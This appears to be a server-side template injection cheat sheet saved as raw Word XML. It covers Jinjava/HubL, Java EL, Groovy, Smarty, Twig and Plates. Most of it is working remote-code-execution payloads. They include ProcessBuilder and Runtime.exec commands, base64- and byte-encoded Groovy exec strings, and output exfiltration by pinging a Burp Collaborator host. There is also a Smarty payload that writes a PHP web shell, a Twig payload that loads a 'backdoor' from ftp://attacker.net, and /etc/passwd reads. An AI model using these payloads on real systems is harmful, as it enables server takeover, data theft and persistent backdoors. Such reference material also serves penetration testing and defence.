    <w:p w14:paraId="27FA4660" w14:textId="3E614053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76AA91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{% set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cmd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'id' %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E4C2F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201997F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10E7A4B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21A6CCF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1712A47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{% set bytes = (1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).TYPE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="413CE0B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forName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java.lang.Runtime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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5785CB1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.methods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[6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CDC9F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.invoke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null,null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6BC9C59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.exec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cmd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36AD5EC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inputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="341927E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readAllBytes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 %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C59D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 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1).TYPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAFDBF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forName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java.lang.String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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B97199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.constructors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[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBD241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newInstance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(([bytes]).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toArray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()) }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791EAB0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lastRenderedPageBreak/>
        <w:t>Jinjava</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894CEA4" w14:textId="38EAFCEE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FC836F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{{'a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toUpperCase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()}} would result in 'A'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF2070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 request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}} would return a request object like com.[...].context.TemplateContextRequest@23548206</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5603D10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Jinjava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is an </w:t>
      </w:r>
      <w:proofErr w:type="gram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open source</w:t>
      </w:r>
      <w:proofErr w:type="gram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project developed by </w:t>
      </w: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Hubspot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available at </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1"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https://github.com/HubSpot/jinjava/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B77231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Jinjava</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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- Command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A9EA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Fixed by </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1"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https://github.com/HubSpot/jinjava/pull/230</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64F5FAA2" w14:textId="614C1B17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B9D040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{{'a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'.getClass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().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new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java.lang.String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('xxx')\")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF441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1BD4539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{{'a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'.getClass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().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new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java.lang.ProcessBuilder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;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x.command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(\\\"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whoami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\\\");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x.start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()\")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B979FE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42DDFE7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{{'a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'.getClass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().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new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java.lang.ProcessBuilder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;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x.command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(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5976FE4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4504EF3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{{'a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'.getClass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().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new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java.lang.ProcessBuilder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;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x.command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(\\\"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uname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\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6959BE2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More information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1190A" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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hyperlink r:id="rId26" w:anchor="jinjava" w:history="1"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https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="008A6EE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>Hubspot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>HuBL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE28DA" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{% %}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statement delimiters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55021A39" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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 }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expression delimiters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB4D8A5" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{# #}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comment delimiters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E806E9" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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 request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}}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- com.hubspot.content.hubl.context.TemplateContextRequest@23548206</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705DF1BB" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{'a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toUpperCase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()}}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- "A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0F9203" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{'a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concat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('b')}}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- "ab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73615953" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{'a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getClass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()}}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java.lang.String</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78ACB5FE" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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request.getClass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()}}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- class </w:t>
      </w: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com.hubspot.content.hubl.context.TemplateContextRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14CEC065" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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request.getClass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getDeclaredMethods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()[0]}}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- public </w:t>
      </w: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com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB7A48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Search for "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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com.hubspot</w:t>
      </w:r>
      <w:proofErr w:type="gram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.content.hubl.context.TemplateContextRequest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" and discovered the </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:proofErr w:type="spellStart"/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Jinjava</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> project on </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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Github</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5230A876" w14:textId="1656CF10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FBB9EA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request.isDebug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()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1E95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//output: False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922BBA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7485BCD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//Using string 'a' to get an instance of class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sun.misc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.Launcher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49AAC01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{{'a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getClass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forName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sun.misc.Launcher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newInstance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()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698753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lastRenderedPageBreak/>
        <w:t xml:space="preserve">//output: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sun.misc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.Launcher@715537d4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D6B68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7524F4D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//It is also possible to get a new object of the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Jinjava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class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1C4D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{{'a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'.getClass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().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B79DCF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//output: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com.hubspot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.jinjava.JinjavaConfig@78a56797</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2021D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24C0059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//It was also possible to call methods on the created object by combining the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A401D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2FE7A2F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6462F1E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42E742D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{% %} and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 }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 blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFD4CF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{% set ji='a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'.getClass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().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7D6A8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526D9B7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51F2ABF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ji.render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('{{1*2}}')}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC7E0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//Here, I created a variable 'ji' with new instance of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com.hubspot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.jinjava.Jinjava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class and obtained reference to the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newInterpreter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method. In the next block, I called the render method on 'ji' with expression {{1*2}}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3C5F3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261E689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//{{'a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'.getClass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().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new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java.lang.String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('xxx')\")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779E98D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//output: xxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A59FD8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095F9E9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//RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34533D4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{{'a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'.getClass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().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new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java.lang.ProcessBuilder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;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x.command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(\\\"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whoami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\\\");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x.start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()\")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7862986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//output: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.UNIXProcess@1e5f456e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797D3F1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54EA64D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//RCE with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org.apache.commons.io.IOUtils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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B865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{{'a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'.getClass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().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new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java.lang.ProcessBuilder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;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x.command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(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC8EB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//output: netstat execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598BF2A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68E8A0E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//Multiple arguments to the commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7256A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Payload: {{'a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'.getClass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().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new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java.lang.ProcessBuilder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;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x.command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(\\\"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uname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\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073F5A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//Output: Linux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bumpy-puma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4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64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x86_64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x86_64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GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA2DF9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More information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5269070A" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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hyperlink r:id="rId28" w:history="1"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https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="223FDA4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>Expression Language - EL (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5D939" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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aaaa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- "</w:t>
      </w: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aaaa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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B03C0" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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${99999+1}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- 100000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271B9E64" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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#{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7*7}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- 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69981A4C" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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${{7*7}}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- 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B35C9C0" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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${{request}}, ${{session}}, {{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faceContext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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989930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Expression Language (EL) is a fundamental feature that facilitates interaction between the presentation layer (like web pages) and the application logic (like managed beans) in </w:t>
      </w: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JavaEE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. It's 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lastRenderedPageBreak/>
        <w:t xml:space="preserve">used extensively across multiple </w:t>
      </w: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JavaEE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technologies to streamline this communication. The key </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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JavaEE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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technologies utilizing EL include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDB64CB" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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JavaServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Faces (JSF)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: Employs EL to bind components in JSF pages to the corresponding backend data and actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B67805" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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JavaServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Pages (JSP)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: EL is used in JSP for accessing and manipulating data within JSP pages, making it easier to connect page elements to the application data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67271B1A" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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Contexts and Dependency Injection for Java EE (CDI)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: EL integrates with CDI to allow seamless interaction between the web layer and managed beans, ensuring a more coherent application structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624792A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Check the following page to learn more about the </w:t>
      </w:r>
      <w:r w:rsidRPr="002E3993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exploitation of EL interpreters</w:t>
      </w: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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED110B0" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E399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hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps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PAGE</w:t>
        </w:r>
        <w:r w:rsidRPr="002E3993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bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>EL - Expression Language</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="657A26D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  <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Groovy (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3136D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The following Security Manager bypasses were taken from this </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="002E3993">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002E399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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D128291" w14:textId="3E990C51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A27DD0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//Basic Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6658169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import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groovy.*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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C68453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@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groovy.transform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.ASTTest(value={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2735754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cmd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"ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E0F42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assert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.Runtime.getRuntime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().exec(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cmd.split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(" "))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7902F0A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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D62B6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def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x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="334AE87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5BC4772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//Payload to get output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C877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import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groovy.*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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3085FCD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@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groovy.transform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.ASTTest(value={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4142F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cmd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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="25B37B9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out = new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java.util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.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).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getInputStream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useDelimiter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("\\A").next()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199129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cmd2 = "ping " +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out.replaceAll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("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C0B2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.Runtime.getRuntime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().exec(cmd2.split(" "))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F54D7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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A95D5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def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x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="206FAD2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7752681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//Other payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7019A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new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groovy.lang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.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert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java.lang.Runtime.getRuntime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().exec(\"calc.exe\")})def x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A956A6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this.evaluate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(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F842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this.evaluate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(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB0CC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Smarty (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641741A1" w14:textId="3D7DBCE1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6B3DB4E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lastRenderedPageBreak/>
        <w:t>{$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smarty.version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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3952B01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php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}echo `id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`;{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php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 //deprecated in smarty v3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AC4B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Smarty_Internal_Write_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File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::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writeFile($SCRIPT_NAME,"&lt;?php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passthru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($_GET['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cmd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']); ?&gt;",self::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clearConfig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())}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D99703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{system('ls')} // compatible v3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12725EE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system(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'cat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index.php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')} // compatible v3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B04A0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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1463D4" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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In Smarty section of </w:t>
      </w:r>
      <w:hyperlink r:id="rId31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https://portswigger.net/research/server-side-template-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F4696D4" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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32" w:anchor="smarty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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3215228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Twig (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDB4566" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{7*7}} = 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A025383" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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${7*7} = ${7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564AB35D" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{7*'7'}} = 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACFCA69" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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{{1/0}} = Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6094C687" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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foobar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}} Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46912593" w14:textId="44E73F20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495B4DE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#Get Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC82DB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{{_self}}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Ref. to current application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DE7E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{{_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self.env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}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F061B0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{{dump(app)}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78489A0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app.request.server.all|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join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',')}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144B379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249FBB4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#File read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE0411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"{{'/etc/passwd'|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file_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excerpt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1,30)}}"@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E3FA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354D1F9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#Exec code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1E4F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_self.env.setCache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("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B79639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_self.env.registerUndefinedFilterCallback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("exec")}}{{_self.env.getFilter("id")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEDA65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_self.env.registerUndefinedFilterCallback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("system")}}{{_self.env.getFilter("whoami")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A132A5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_self.env.registerUndefinedFilterCallback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("system")}}{{_self.env.getFilter("id;uname -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a;hostname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")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BA06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{{['id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']|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filter('system')}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C543DC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{{['cat\x20/etc/passwd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']|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filter('system')}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D27F9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{{['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cat$IFS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/etc/passwd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']|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filter('system')}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64749EB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{{['id',"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"]|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sort('system')}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F99F6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4B662DB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#Hide warnings and errors for automatic exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F43E1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{{["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error_reporting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", "0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"]|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sort("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ini_set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")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDC65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Twig - Template format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AE482D" w14:textId="648EBE17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3413C10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$output = $twig &gt; render (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E061A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'Dear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 .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$_GET['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custom_greeting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'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F106F5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array(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first_name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 =&gt; $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user.first_name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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148CEEC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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB0C6F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01CD016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$output = $twig &gt; render (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC0EB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"Dear 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first_name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}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D0F5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array(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first_name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 =&gt; $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user.first_name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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7393834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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D203DD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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F15578" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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In Twig and Twig (Sandboxed) section of </w:t>
      </w:r>
      <w:hyperlink r:id="rId33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https://portswigger.net/research/server-side-template-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D68B9E1" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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34" w:anchor="twig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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75AFCC0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Plates (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433C3F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Plates is a templating engine native to PHP, drawing inspiration from Twig. However, unlike Twig, which introduces a new syntax, Plates leverages native PHP code in templates, making it intuitive for PHP developers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F2ED2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Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02817B3E" w14:textId="73C39848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3C61AD3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 Create new Plates instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F55C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$templates = new League\Plates\Engine('/path/to/templates'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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3ACAC4B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0FEA031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 Render a template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F84617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echo $templates-&gt;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render(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'profile', ['name' =&gt; 'Jonathan']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349B03B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Page template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA7140" w14:textId="2CCAA916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7207820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&lt;?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php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$this-&gt;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layout(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'template', ['title' =&gt; 'User Profile']) ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2515632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408A743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lastRenderedPageBreak/>
        <w:t>&lt;h1&gt;User Profile&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9924A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&lt;p&gt;Hello,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&lt;?=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$this-&gt;e($name)?&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002080E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Layout template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FEBE8A" w14:textId="34C55210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3CE0A80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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119BBC9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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E935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&lt;title&gt;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&lt;?=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$this-&gt;e($title)?&gt;&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448864E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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F94A18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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405922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&lt;?=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$this-&gt;section('content')?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5DC4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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F98E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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B8E5D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information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55B3AE" w14:textId="77777777" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E3993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35" w:anchor="plates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https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates</w:t>
        </w:r>
      </w:hyperlink>
